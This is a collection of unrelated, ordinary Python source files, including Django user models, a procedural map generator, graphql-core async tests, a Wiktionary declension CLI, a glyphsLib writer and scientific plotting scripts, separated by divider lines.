user = self.model(email=email, **extra_fields)
user.set_password(password)
user.save()
return user
def create_superuser(self, email, password, **extra_fields):
extra_fields.setdefault('is_staff', True)
extra_fields.setdefault('is_superuser', True)
extra_fields.setdefault('is_active', True)
if extra_fields.get('is_staff') is not True:
raise ValueError('Superuser must have is_staff=True.')
if extra_fields.get('is_superuser') is not True:
raise ValueError('Superuser must have is_superuser=True.')
return self.create_user(email, password, **extra_fields)
class CustomUser(AbstractUser):
username = None
email = models.EmailField('email address', unique=True)
    is_professor = models.BooleanField('is this user a professor?', default=False)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
objects = CustomUserManager()
def __str__(self):
        return self.email
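# A hedged configuration sketch (not from the original project): a custom user
# model like this one is normally activated by pointing AUTH_USER_MODEL at it
# in settings.py before the first migration; "accounts" is an assumed
# placeholder for the app label this model actually lives in.
#
#     AUTH_USER_MODEL = 'accounts.CustomUser'
|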
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : kernel.py
# Author : Jiayuan Mao
# Email : [email protected]
# Date : 02/04/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
"""Useful utilities for kernel-based attention mechanism."""
import torch
from .linalg import normalize
__all__ = ['inverse_distance', 'cosine_distance', 'dot']
def inverse_distance(f_lookup, f, p=2, eps=1e-8):
"""
Inverse distance kernel.
Args:
f_lookup (FloatTensor): features of the lookup keys
f (FloatTensor): features of the value keys
Returns:
        FloatTensor: the attention mask for each lookup key.
"""
n, m, k = f_lookup.size(0), f.size(0), f.size(1)
f_lookup = f_lookup.view(n, 1, k).expand(n, m, k)
f = f.view(1, m, k).expand(n, m, k)
# TODO(Jiayuan Mao @ 05/26): this function can be optimized.
dist = (f_lookup - f).norm(p, dim=2)
return 1. / dist.clamp(min=eps)
def cosine_distance(f_lookup, f):
"""
Cosine distance kernel.
Args:
f_lookup (FloatTensor): features of the lookup keys
f (FloatTensor): features of the value keys
Returns:
        FloatTensor: the attention mask for each lookup key.
"""
f_lookup = normalize(f_lookup, 2, dim=1)
f = normalize(f, 2, dim=1)
return torch.mm(f_lookup, f.t())
def dot(f_lookup, f):
"""
Dot product kernel, essentially a cosine distance kernel without normalization.
Args:
f_lookup (FloatTensor): features of the lookup keys
f (FloatTensor): features of the value keys
Returns:
        FloatTensor: the attention mask for each lookup key.
"""
return torch.mm(f_lookup, f.t())
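# A minimal sketch (not part of the original module) of turning these kernels
# into attention weights; the shapes and the softmax step are illustrative
# assumptions, not Jacinle API:
#
#     >>> f_lookup = torch.randn(4, 16)   # 4 lookup keys, 16-dim features
#     >>> f = torch.randn(10, 16)         # 10 value keys, 16-dim features
#     >>> inverse_distance(f_lookup, f).shape
#     torch.Size([4, 10])
#     >>> attention = torch.softmax(dot(f_lookup, f), dim=1)  # each row sums to 1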
|
# ==========================================================
# INFORMATION:
# -----------------------------
# PURPOSE:
# Main body of the 2D procedural
# map generation program
# ==========================================================
import time
import sys
from modules.short_class_import import BoardBox, Seed
from modules.decisional import generate_box
from modules.encyclopedia_functions import encyclopedia_creation
from modules.image_creation import write_image_header, write_image_body
from modules.trees_generation import generate_trees
from modules.utilities import is_integer, print_progress
###############################################################
######################### USER CHOICES #########################
###############################################################
print("Hello, welcome to pyprocgen, a 2D procedural map generator. \n")
# ... of the map size:
print("- Enter the map's dimensions :")
print(" Tip : enter integers between 100 and 5000")
# For the width:
width = None
while not is_integer(width):
if width is not None:
print(" Enter an integer.")
width = input(" Width : ")
width = int(width)
# For the height:
height = None
while not is_integer(height):
if height is not None:
print(" Enter an integer.")
height = input(" Height : ")
height = int(height)
print("")
# ... of the usage mode
advanced_mode = input("- Do you want to use advanced mode ? (y - N) : ")
print("")
###############################################################
######################## ADVANCED MODE #########################
###############################################################
if advanced_mode == "y" or advanced_mode == "Y":
    # ... of the seed
choice = input("- Do you want to enter a seed ? (y / N) : ")
if choice == "y" or choice == "Y":
print(" Tip : a seed looks like a:b:c:d where a,b,c,d are integers")
seed_in_string = ""
while not Seed.is_seed(seed_in_string):
if seed_in_string != "":
print(" This is not a seed.")
seed_in_string = input(" Enter the seed : ")
seed = Seed(seed_in_string=seed_in_string)
else:
seed = Seed()
print("")
    # ... of whether to place trees
choice = input("- Do you want trees on the map ? (Y / n) : ")
place_trees = (choice != "n" and choice != "N")
print("")
###############################################################
######################### BASIC MODE ###########################
###############################################################
else:
seed = Seed()
place_trees = True
###############################################################
########################## CONSTANTS ###########################
###############################################################
begin_time = time.time()
print_progress_opt = ("idlelib" not in sys.modules)
print("Seed of the map : " + str(seed) + "\n")
encyclopedia = encyclopedia_creation()
###############################################################
################## CREATING THE IMAGE HEADER ###################
###############################################################
destination_file = open("generated_map.ppm", "w")
write_image_header(destination_file, height, width, str(seed))
###############################################################
################ CREATING THE IMAGE WITH TREES #################
###############################################################
if place_trees:
chunk_height = encyclopedia.get_max_height_of_trees()
    # Create the initial chunk
    # The image is built in chunks of width*chunk_height
    # to save RAM
actual_chunk = BoardBox.create_empty_board(width=width, height=chunk_height)
for line_number in range(chunk_height):
for column_number in range(width):
actual_chunk.set_element(
value=generate_box(
encyclopedia=encyclopedia,
x=column_number,
y=line_number,
seed=seed
),
x=column_number,
y=line_number
)
    # Create the intermediate chunks
for chunk_number in range(int(height / chunk_height)):
chunk_number += 1
next_chunk = BoardBox.create_empty_board(width=width, height=chunk_height)
for line_number in range(chunk_height):
for column_number in range(width):
next_chunk.set_element(
value=generate_box(
encyclopedia=encyclopedia,
x=column_number,
y=line_number + chunk_number*chunk_height,
seed=seed
),
x=column_number,
y=line_number
)
chunk_amalgamation = BoardBox(actual_chunk.get_elements() + next_chunk.get_elements())
generate_trees(chunk_amalgamation)
actual_chunk = BoardBox(chunk_amalgamation.get_elements()[:chunk_height])
write_image_body(destination_file, actual_chunk)
actual_chunk = BoardBox(chunk_amalgamation.get_elements()[chunk_height:])
if print_progress_opt:
print_progress(
text="Creation of the map : ",
progression=((chunk_number + 1) * chunk_height) / height
)
chunk_number -= 1
    # Create the last chunk
last_chunk = BoardBox(actual_chunk.get_elements()[0:(height % chunk_height)])
write_image_body(destination_file, last_chunk)
if print_progress_opt:
print_progress("Creation of the map : ", 1.0)
###############################################################
############### CREATING THE IMAGE WITHOUT TREES ###############
###############################################################
else:
    for line_number in range(height): # The image is built line by line
chunk = BoardBox.create_empty_board(width, 1)
for column_number in range(width):
chunk.set_element(
value=generate_box(
encyclopedia,
column_number,
line_number,
seed
),
x=column_number,
y=0
)
write_image_body(destination_file, chunk)
if print_progress_opt:
print_progress(
"Creation of the map : ", (line_number + 1) / height)
###############################################################
################### PRINTING FINAL MESSAGES ####################
###############################################################
destination_file.close()
print("")
print("Done")
print("Execution time : ", time.time() - begin_time)
|
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import AxesGrid
def shiftedMap(cmap, start=0, midpoint=0.5, stop=1.0, name='shiftedcmap'):
cdict = {
'red': [],
'green': [],
'blue': [],
'alpha': []
}
# regular index to compute the colors
reg_index = np.linspace(start, stop, 257)
# shifted index to match the data
shift_index = np.hstack([
np.linspace(0.0, midpoint, 128, endpoint=False),
np.linspace(midpoint, 1.0, 129, endpoint=True)
])
for ri, si in zip(reg_index, shift_index):
r, g, b, a = cmap(ri)
cdict['red'].append((si, r, r))
cdict['green'].append((si, g, g))
cdict['blue'].append((si, b, b))
cdict['alpha'].append((si, a, a))
newcmap = matplotlib.colors.LinearSegmentedColormap(name, cdict)
plt.register_cmap(cmap=newcmap)
    return newcmap
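# A minimal usage sketch (not part of the original snippet): for data skewed
# around zero, the midpoint can be chosen so that zero lands on the centre of a
# diverging colormap; the random data below are placeholders.
if __name__ == '__main__':
    data = np.random.uniform(-1.0, 3.0, size=(50, 50))
    midpoint = abs(data.min()) / (data.max() - data.min())  # where zero falls in [0, 1]
    shifted = shiftedMap(matplotlib.cm.seismic, midpoint=midpoint, name='shifted_seismic')
    plt.imshow(data, cmap=shifted)
    plt.colorbar()
    plt.show()
|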
def foo():
print("Hello justuse-user!") |
import asyncio
from pytest import mark
from graphql.execution import execute
from graphql.language import parse
from graphql.type import (
GraphQLSchema,
GraphQLObjectType,
GraphQLField,
GraphQLList,
GraphQLInterfaceType,
GraphQLBoolean,
GraphQLInt,
GraphQLString,
)
class Barrier:
"""Barrier that makes progress only after a certain number of waits."""
def __init__(self, number: int) -> None:
self.event = asyncio.Event()
self.number = number
async def wait(self) -> bool:
self.number -= 1
if not self.number:
self.event.set()
return await self.event.wait()
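# A minimal sketch (not part of the test suite) of the Barrier above: every
# wait() call blocks until the configured number of waiters has arrived, after
# which they all return True at once.
#
#     async def _demo():
#         barrier = Barrier(2)
#         return await asyncio.gather(barrier.wait(), barrier.wait())
#
#     asyncio.run(_demo())  # -> [True, True]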
def describe_parallel_execution():
@mark.asyncio
async def resolve_fields_in_parallel():
barrier = Barrier(2)
async def resolve(*_args):
return await barrier.wait()
schema = GraphQLSchema(
GraphQLObjectType(
"Query",
{
"foo": GraphQLField(GraphQLBoolean, resolve=resolve),
"bar": GraphQLField(GraphQLBoolean, resolve=resolve),
},
)
)
ast = parse("{foo, bar}")
# raises TimeoutError if not parallel
result = await asyncio.wait_for(execute(schema, ast), 1.0)
assert result == ({"foo": True, "bar": True}, None)
@mark.asyncio
async def resolve_list_in_parallel():
barrier = Barrier(2)
async def resolve(*_args):
return await barrier.wait()
async def resolve_list(*args):
return [resolve(*args), resolve(*args)]
schema = GraphQLSchema(
GraphQLObjectType(
"Query",
{
"foo": GraphQLField(
GraphQLList(GraphQLBoolean), resolve=resolve_list
)
},
)
)
ast = parse("{foo}")
# raises TimeoutError if not parallel
result = await asyncio.wait_for(execute(schema, ast), 1.0)
assert result == ({"foo": [True, True]}, None)
@mark.asyncio
async def resolve_is_type_of_in_parallel():
FooType = GraphQLInterfaceType("Foo", {"foo": GraphQLField(GraphQLString)})
barrier = Barrier(4)
async def is_type_of_bar(obj, *_args):
await barrier.wait()
return obj["foo"] == "bar"
BarType = GraphQLObjectType(
"Bar",
{"foo": GraphQLField(GraphQLString), "foobar": GraphQLField(GraphQLInt)},
interfaces=[FooType],
is_type_of=is_type_of_bar,
)
async def is_type_of_baz(obj, *_args):
await barrier.wait()
return obj["foo"] == "baz"
BazType = GraphQLObjectType(
"Baz",
{"foo": GraphQLField(GraphQLString), "foobaz": GraphQLField(GraphQLInt)},
interfaces=[FooType],
is_type_of=is_type_of_baz,
)
schema = GraphQLSchema(
GraphQLObjectType(
"Query",
{
"foo": GraphQLField(
GraphQLList(FooType),
resolve=lambda *_args: [
{"foo": "bar", "foobar": 1},
{"foo": "baz", "foobaz": 2},
],
)
},
),
types=[BarType, BazType],
)
ast = parse(
"""
{
foo {
foo
... on Bar { foobar }
... on Baz { foobaz }
}
}
"""
)
# raises TimeoutError if not parallel
result = await asyncio.wait_for(execute(schema, ast), 1.0)
assert result == (
{"foo": [{"foo": "bar", "foobar": 1}, {"foo": "baz", "foobaz": 2}]},
None,
)
|
# Author: Xinshuo Weng
# email: [email protected]
import numpy as np
from PIL import Image
import init_paths
from prob_stat import hist_equalization
from xinshuo_visualization import visualize_distribution, visualize_image
def test_hist_equalization():
print('testing for gaussian distribution')
random_data = np.random.normal(0.5, 0.1, 10000)
visualize_distribution(random_data, vis=True)
num_bins = 100
data_equalized = hist_equalization(random_data, num_bins=num_bins)
visualize_distribution(data_equalized, vis=True)
print('testing for image data')
image_path = 'lena.jpg'
img = np.array(Image.open(image_path).convert('L'))
visualize_image(img, vis=True)
num_bins = 256
data_equalized = hist_equalization(img, num_bins=num_bins)
visualize_image(data_equalized, vis=True)
print('\n\nDONE! SUCCESSFUL!!\n')
if __name__ == '__main__':
test_hist_equalization() |
"""
Oracle implementation of Files.InFileset
"""
from WMCore.WMBS.MySQL.Files.InFileset import InFileset as InFilesetMySQL
class InFileset(InFilesetMySQL):
pass
|
"""
Retrieve declination for given word using wiktionary API.
"""
import re
import click
import requests
import tabulate
import bs4
API = 'http://de.wiktionary.org/w/api.php'
@click.command()
@click.argument('word')
@click.option('--table-fmt', type=click.Choice(tabulate.tabulate_formats),
help='Visual text formatting for the output table',
default='simple')
@click.option('-d', '--definition', is_flag=True,
help='Retrieve definition')
def cli(word, definition, table_fmt):
"""Retrieve declination for given word in german."""
response = requests.get(API, params={
'action': 'parse',
'format': 'json',
'page': word
})
response.raise_for_status()
if 'error' not in response.json():
soup = bs4.BeautifulSoup(
response.json()['parse']['text']['*'],
'html.parser'
)
table = HtmlTableParser(
soup, class_=re.compile(r'.*hintergrundfarbe2$'))
table = table.parse()
table.filter_empty()
table.apply_filter('rows', r'.*Alle weiteren Formen.*')
click.echo(tabulate.tabulate(
table.rows, headers='firstrow', tablefmt=table_fmt) + '\n')
if definition:
bedeutungen = [e.get_text() for e in soup
.find('p', title='Sinn und Bezeichnetes (Semantik)')
.find_next_sibling('dl')
.find_all('dd')]
click.secho('Definition', fg='bright_cyan')
click.echo('\n'.join(bedeutungen))
else:
click.secho('Error for word "{}". Code: {}. Info: {}'.format(
word.encode('utf-8'),
response.json()['error'].get('code', 'unknown'),
response.json()['error'].get('info', 'unknown')), fg='yellow')
class HtmlTableParser(object):
"""Given an html and keyword arguments accepted
in find method of BeautifulSoup, get table and
return a Table object.
"""
def __init__(self, html, **kwargs):
self.html = html
self.kwargs = kwargs
self.table = None
def parse(self):
"""Parse an html table. Return a Table object"""
self.table = self.html.find(**self.kwargs)
if self.table is None:
raise click.ClickException(
'No table was found for query: {}'.format(str(self.kwargs)))
rows = []
rowspan = {}
for row in self.table.find_all('tr'):
current = []
c_cell = 0
for cell in row.find_all(re.compile(r'(th|td)')):
if c_cell in rowspan and rowspan[c_cell] > 0:
current.append('')
rowspan[c_cell] -= 1
if cell.name == 'th':
current.append(click.style(
cell.get_text().replace('\n', ' '), fg='bright_blue'))
else:
current.append(cell.get_text().replace('\n', ' '))
if cell.has_attr('colspan'):
current.extend('' for i in range(
int(cell['colspan']) - 1))
if cell.has_attr('rowspan'):
rowspan[c_cell] = int(cell['rowspan']) - 1
c_cell += 1
rows.append(current)
return Table(rows)
@property
def html(self):
"""Proper HTML """
return self._html
@html.setter
def html(self, val):
"""Verify that html is actually a bs4 object """
if not isinstance(val, bs4.element.Tag):
raise ValueError(
'"{}" is not an instance of bs4.element.Tag'.format(val))
self._html = val
class Table(object):
"""Table object for easy dealing with rows, columns
and filters
"""
def __init__(self, data):
self.rows = data
self.columns = list(zip(*data))
def filter_empty(self):
""" Filter empty values from columns and rows """
for col in self.columns[:]:
if all(val == '' for val in col):
for row in self.rows:
del row[self.columns.index(col)]
del self.columns[self.columns.index(col)]
def apply_filter(self, data_item, regex):
""" Apply filter to row or column """
try:
regex = re.compile(regex)
except ValueError:
raise click.ClickException(
'Could not compile regular expression "{}"'.format(regex))
if data_item == 'rows':
self.rows = [e for e in self.rows
if not any(regex.match(i) for i in e)]
self.columns = list(zip(*self.rows))
if data_item == 'columns':
for col in self.columns[:]:
if any(regex.match(val) for val in col):
for row in self.rows:
del row[self.columns.index(col)]
del self.columns[self.columns.index(col)]
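# A small illustrative sketch (not from the original tool) of how the Table
# filters behave on hand-made data:
#
#     >>> t = Table([['Kasus', 'Singular', ''], ['Nominativ', 'das Wort', '']])
#     >>> t.filter_empty()                        # drops the all-empty column
#     >>> t.apply_filter('rows', r'Nominativ.*')  # drops rows matching the regex
#     >>> t.rows
#     [['Kasus', 'Singular']]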
|
import time , os
os.system("clear")
txt = "Hello World ! \nThis is a test.\nHope,it will work.\nSee You Soon!"
for i in range(0,len(txt)):
print(txt[i],end="", flush=True)
time.sleep(0.1)
print ("")
my_string = 'Hello world ! This is a test.'
time.sleep(0.3)
for i in range(0,5):
print (my_string,end="\r")
for j in range(0,len(my_string)):
my_string = my_string[1:] + my_string[:1]
print (my_string,end="\r")
time.sleep(0.2)
print ("")
|
# Copyright 2016 Georg Seifert. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: #www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glyphsLib.classes
from glyphsLib.types import floatToString5
import logging
import datetime
from collections import OrderedDict
from io import StringIO
"""
Usage
>> fp = open('Path/to/File.glyphs', 'w')
>> writer = Writer(fp)
>> writer.write(font)
>> fp.close()
"""
logger = logging.getLogger(__name__)
class Writer:
def __init__(self, fp, format_version=2):
# figure out whether file object expects bytes or unicodes
try:
fp.write(b"")
except TypeError:
fp.write("") # this better not fail...
# file already accepts unicodes; use it directly
self.file = fp
else:
# file expects bytes; wrap it in a UTF-8 codecs.StreamWriter
import codecs
self.file = codecs.getwriter("utf-8")(fp)
self.format_version = format_version
def write(self, rootObject):
self.writeDict(rootObject)
self.file.write("\n")
def writeDict(self, dictValue):
if hasattr(dictValue, "_serialize_to_plist"):
self.file.write("{\n")
dictValue._serialize_to_plist(self)
self.file.write("}")
return
self.file.write("{\n")
keys = dictValue.keys()
if not isinstance(dictValue, OrderedDict):
keys = sorted(keys)
for key in keys:
try:
if isinstance(dictValue, (dict, OrderedDict)):
value = dictValue[key]
else:
getKey = key
value = getattr(dictValue, getKey)
except AttributeError:
continue
if value is None:
continue
self.writeKeyValue(key, value)
self.file.write("}")
def writeArray(self, arrayValue):
self.file.write("(\n")
idx = 0
length = len(arrayValue)
if hasattr(arrayValue, "plistArray"):
arrayValue = arrayValue.plistArray()
for value in arrayValue:
self.writeValue(value)
if idx < length - 1:
self.file.write(",\n")
else:
self.file.write("\n")
idx += 1
self.file.write(")")
def writeUserData(self, userDataValue):
self.file.write("{\n")
keys = sorted(userDataValue.keys())
for key in keys:
value = userDataValue[key]
self.writeKey(key)
self.writeValue(value, key)
self.file.write(";\n")
self.file.write("}")
def writeKeyValue(self, key, value):
self.writeKey(key)
self.writeValue(value, key)
self.file.write(";\n")
def writeObjectKeyValue(self, d, key, condition=None, keyName=None, default=None):
value = getattr(d, key)
if condition == "if_true":
condition = bool(value)
if condition is None:
if default is not None:
condition = value != default
else:
condition = value is not None
if condition:
self.writeKey(keyName or key)
self.writeValue(value, key)
self.file.write(";\n")
def writeValue(self, value, forKey=None):
if hasattr(value, "plistValue"):
value = value.plistValue(format_version=self.format_version)
if value is not None:
self.file.write(value)
elif forKey in ["color", "strokeColor"] and hasattr(value, "__iter__"):
# We have to write color tuples on one line or Glyphs 2.4.x
# misreads it.
if self.format_version == 2:
self.file.write(str(tuple(value)))
else:
self.file.write("(")
for ix, v in enumerate(value):
self.file.write(str(v))
if ix < len(value) - 1:
self.file.write(",")
self.file.write(")")
elif isinstance(value, (list, glyphsLib.classes.Proxy)):
if isinstance(value, glyphsLib.classes.UserDataProxy):
self.writeUserData(value)
else:
self.writeArray(value)
elif isinstance(value, (dict, OrderedDict, glyphsLib.classes.GSBase)):
self.writeDict(value)
elif type(value) == float:
self.file.write(floatToString5(value))
elif type(value) == int:
self.file.write(str(value))
elif type(value) == bytes:
self.file.write("<" + value.hex() + ">")
elif type(value) == bool:
if value:
self.file.write("1")
else:
self.file.write("0")
elif type(value) == datetime.datetime:
self.file.write('"%s +0000"' % str(value))
else:
value = str(value)
if self.format_version < 3:
if forKey != "unicode":
value = escape_string(value)
else:
if _needs_quotes(value) or " " in value:
value = '"%s"' % value
self.file.write(value)
def writeKey(self, key):
key = escape_string(key)
self.file.write("%s = " % key)
def dump(obj, fp):
"""Write a GSFont object to a .glyphs file.
'fp' should be a (writable) file object.
"""
writer = Writer(fp)
logger.info("Writing .glyphs file")
if hasattr(obj, "format_version"):
writer.format_version = obj.format_version
writer.write(obj)
def dumps(obj):
"""Serialize a GSFont object to a .glyphs file format.
Return a (unicode) str object.
"""
fp = StringIO()
dump(obj, fp)
return fp.getvalue()
NSPropertyListNameSet = (
# 0
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
# 16
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
# 32
False,
False,
False,
False,
True,
False,
False,
False,
False,
False,
False,
False,
False,
False,
True,
False,
# 48
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
False,
False,
False,
False,
False,
False,
# 64
False,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
# 80
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
False,
False,
False,
False,
True,
# 96
False,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
# 112
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
False,
False,
False,
False,
False,
)
def _needs_quotes(string):
if len(string) == 0:
return True
# Does it need quotes because of special characters?
for c in string:
d = ord(c)
if d >= 128 or not NSPropertyListNameSet[d]:
return True
# Does it need quotes because it could be confused with a number?
try:
int(string)
except ValueError:
pass
else:
return True
try:
float(string)
except ValueError:
return False
else:
return True
def escape_string(string):
if _needs_quotes(string):
string = string.replace("\\", "\\\\")
string = string.replace('"', '\\"')
string = string.replace("\n", "\\012")
string = '"%s"' % string
return string
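# A few illustrative cases (not from the original module) of the quoting rules
# implemented by _needs_quotes/escape_string above:
#
#     >>> escape_string("Regular")      # identifier-like, no quoting needed
#     'Regular'
#     >>> escape_string("hello world")  # the space forces quoting
#     '"hello world"'
#     >>> escape_string("1234")         # could be confused with a number
#     '"1234"'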
|
"""
20161208 Scott Havens
Convert the IPW images for the topo input into a netCDF file
"""
from datetime import datetime
import netCDF4 as nc
from smrf import ipw
file_name = 'topo.nc'
f = {
'dem': 'dem.ipw',
'mask': 'mask.ipw',
'veg_height': 'veg_height.ipw',
'veg_k': 'veg_k.ipw',
'veg_tau': 'veg_tau.ipw',
'veg_type': 'veg_type.ipw'
}
# get the x,y
d = ipw.IPW(f['dem'])
x = d.bands[0].x
y = d.bands[0].y
# create the netCDF file
s = nc.Dataset(file_name, 'w', format='NETCDF4', clobber=True)
# add dimensions
dimensions = ['y', 'x']
s.createDimension(dimensions[0], y.shape[0])
s.createDimension(dimensions[1], x.shape[0])
# create the variables
s.createVariable('y', 'f', dimensions[0])
s.createVariable('x', 'f', dimensions[1])
# define some attributes
setattr(s.variables['y'], 'units', 'meters')
setattr(s.variables['y'], 'description', 'UTM, north south')
setattr(s.variables['x'], 'units', 'meters')
setattr(s.variables['x'], 'description', 'UTM, east west')
# define some global attributes
fmt = '%Y-%m-%d %H:%M:%S'
setattr(s, 'Conventions', 'CF-1.6')
setattr(s, 'dateCreated', datetime.now().strftime(fmt))
setattr(s, 'title', 'Distributed data from SMRF')
setattr(s, 'history', '[%s] Create netCDF4 file' % datetime.now().strftime(fmt))
s.variables['y'][:] = y
s.variables['x'][:] = x
for key,file_image in f.items():
d = ipw.IPW(file_image)
s.createVariable(key, 'f', (dimensions[0],dimensions[1]))
s.variables[key][:] = d.bands[0].data
s.close()
|
import setuptools
#long_description = open('README.md').read()
setuptools.setup(
name='canary_training',
version='0.1',
author='broydj',
author_email='[email protected]',
description='',
#long_description=long_description,
#long_description_content_type='text/markdown',
url='',
#packages=setuptools.find_packages('src'),
#package_dir={'': 'src'},
packages=['canary_training'],
package_data={"canary_training": ["instance_data_unnormalized.csv","instance_price_info.csv"]}
#package_dat a= {"canary_training": "instance_price_info.csv"}
#classifiers=[
# 'Programming Language :: Python :: 3',
# 'Operating System :: OS Independent',
#],
#python_requires='>=3',
)
|
# File automatically generated by mapry. DO NOT EDIT OR APPEND!
"""defines some object graph."""
import typing
class SomeGraph:
"""defines some object graph."""
def __init__(
self,
map_of_strings: typing.MutableMapping[str, str]) -> None:
"""
initializes an instance of SomeGraph with the given values.
:param map_of_strings: tests a map of strings.
"""
self.map_of_strings = map_of_strings
# File automatically generated by mapry. DO NOT EDIT OR APPEND!
|
import numpy as np
from scipy.interpolate import spline
import matplotlib.pyplot as plt
plt.style.use('paper2')
r1_Pd2plus = [1.6, 1.7030303, 1.80606061, 1.90909091, 2.01212121, 2.11515152, 2.21818182, 2.32121212, 2.42424242,
2.52727273, 2.63030303, 2.73333333, 2.83636364, 2.93939394, 3.04242424, 3.14545455, 3.24848485,
3.35151515, 3.45454545, 3.55757576, 3.66060606, 3.76363636, 3.86666667, 3.96969697, 4.07272727,
4.17575758, 4.27878788, 4.38181818, 4.48484848, 4.58787879, 4.69090909, 4.79393939, 4.8969697]
rel_e_Pd2plus = [38.11222905,
16.09151587,
5.16067295,
0.686415975,
0.0,
1.35282725,
3.822761375,
6.69154705,
9.5241197,
12.27489772,
14.69121198,
16.79875857,
18.65167195,
20.1697827,
21.40692405,
22.4070963,
23.16556182,
23.71415998,
24.10442105,
24.35747925,
24.5069623,
24.57261762,
24.57175795,
24.5190103,
24.4292276,
24.3082456,
24.16110313,
23.9930147,
23.80596323,
23.6098381,
23.39979502,
23.1783942,
22.94677767]
r1_pyridine = [2.11, 2.2, 2.31, 2.41, 2.5, 2.61, 2.7, 2.8, 2.91, 3, 3.11, 3.21, 3.3, 3.41, 3.5, 3.51, 3.6, 3.7, 3.8,
3.9, 4, 4.1, 4.2, 4.3, 4.4, 4.5, 4.61, 4.71, 4.81, 4.91, 5.01]
rel_e_Pd2plus_py = [37.86495013, 28.04610622, 19.53074298, 13.25679718, 9.374743325, 6.095378125, 4.1413494,
2.599738775, 1.234461925, 0.720602175, 0.561919975, 0, 0.135772175, 0.311760825, 0.71337965,
0.66255215, 1.013468975, 1.2578614, 1.898043175, 2.08690185, 2.47176015, 2.892392225, 3.3117191,
3.68095265, 4.04610745, 4.4086393, 4.67067075, 4.7327054, 4.94059615, 5.10161265, 5.19493445]
rel_e_2plus_py = [22.30252343, 17.48407015, 13.09094265, 9.6683694, 7.2093977, 4.989170925, 3.403804725, 2.110389175,
1.11560715, 0.633931875, 0.23407005, 0, 0.233932, 0.179069675, 0.363655075, 0.349486125, 0.513753075,
0.7560622, 1.032808525, 1.3966895, 1.83969195, 2.1511202, 2.264114125, 2.579156775, 2.848241325,
3.1159642, 3.335030725, 3.499460825, 3.63506985, 3.7076214, 3.78007255]
rel_e_py = [
#39.7421854,
#30.6156999,
23.46876355,
18.70673507,
14.16180905,
10.63418602,
8.30607945,
6.10744495,
4.70415415,
3.41850705,
2.463383025,
1.859564875,
1.30330495,
0.855125625,
0.5731083,
0.315362675,
0.155387825,
0.170196825,
0.057673525,
0.002604125,
0.0,
0.013949325,
0.0323037,
0.052904525,
0.079560725,
0.12307785,
0.170435275,
0.220635275,
0.2793128,
0.34704515,
0.417915,
0.47937235,
0.551126975
]
if __name__ == '__main__':
# Min point is 11
more_r1 = np.linspace(min(r1_Pd2plus), max(r1_Pd2plus), 200)
smooth_rel_e_Pd2plus = spline(r1_Pd2plus[::2], rel_e_Pd2plus[::2], more_r1)
plt.plot(more_r1, smooth_rel_e_Pd2plus, ls='-', c='k', lw=1.5, alpha=0.3)
plt.scatter(r1_Pd2plus, rel_e_Pd2plus, marker='o', c='k', label='Pd$^{2+}$', alpha=0.3)
more_r1 = np.linspace(min(r1_pyridine), max(r1_pyridine), 200)
smooth_rel_e_Pd2plus_py = spline(r1_pyridine[::2], rel_e_Pd2plus_py[::2], more_r1)
plt.plot(more_r1, smooth_rel_e_Pd2plus_py, ls='-', c='k', lw=1.5)
plt.scatter(r1_pyridine, rel_e_Pd2plus_py, marker='s', label='[Pd(pyridine)$_4$]$^{2+}$', c='k')
smooth_rel_e_2plus_py = spline(r1_pyridine, rel_e_2plus_py, more_r1)
plt.plot(more_r1, smooth_rel_e_2plus_py, ls='-', c='k', lw=1.5)
plt.scatter(r1_pyridine, rel_e_2plus_py, marker='^', label='[(pyridine)$_4$]$^{2+}$', c='k')
smooth_rel_e_py = spline(r1_pyridine, rel_e_py, more_r1)
plt.plot(more_r1, smooth_rel_e_py, ls='-', c='k', lw=1.5)
plt.scatter(r1_pyridine, rel_e_py, marker='D', label='[(pyridine)$_4$]', c='k')
plt.ylabel('$\Delta E$ / kcal mol$^{-1}$')
plt.xlabel('$r$ / Å')
plt.ylim(-3, 30)
# plt.legend(prop={'size': 13})
plt.tight_layout()
plt.show()
|
""" -------------------- MAIN BENCHMARKING SCRIPT -----------------------
Run this script by executing the following from a command prompt:
python3 benchmark.py
Or, use just "python benchmark.py" if that is how you normally access Python 3.
On some operating systems (Linux, Mac OSX), you may be able to run the script
by executing "./benchmark.py" if you have changed the file mode of the file
to be executable.
This script uses settings from a "settings.py" file, which should be placed
in the same directory as this script. Start by copying "settings_example.py"
to "settings.py" and then modify settings in that copied file.
In the settings file, you can specify the path to the Utility Bill CSV file you
want to read and the spreadsheet Other Data file, which contains the list of
sites to process, information (e.g. square feet) about each site, and degree day
data. Modify this spreadsheet according to your needs; create multiple
versions if you sometimes only want to process some of the sites. The "data"
directory is the best place to put Utility Bill and Other Data files.
All reports and other output from this script appear in the "output" directory.
View the resulting benchmarking report by opening the "output/index.html" file.
Other useful data is put in the "output/extra_data" directory, including a
spreadsheet that summarizes utility information for all of the buildings.
Each time the script is run, all files in the output directory are deleted and
replaced with new files. So, if you have modified any of these files and want
to save your modifications, copy the files to a location outside the output
directory.
The main script code is found at the *bottom* of this file; prior to that script
code are the functions that do the main work. The script code handles the main
control flow. This script also relies on a couple of modules: bench_util.py,
graph_util.py, and template_util.py. These are present in this directory.
"""
import time
import pickle
import glob
import os
import pprint
import datetime
import warnings
import pandas as pd
import numpy as np
import bench_util as bu
import graph_util as gu
import template_util
import shutil
import settings # the file holding settings for this script
# Filter out Matplotlib warnings, as we sometimes get warnings
# related to blank graphs.
warnings.filterwarnings("ignore", module="matplotlib")
#*****************************************************************************
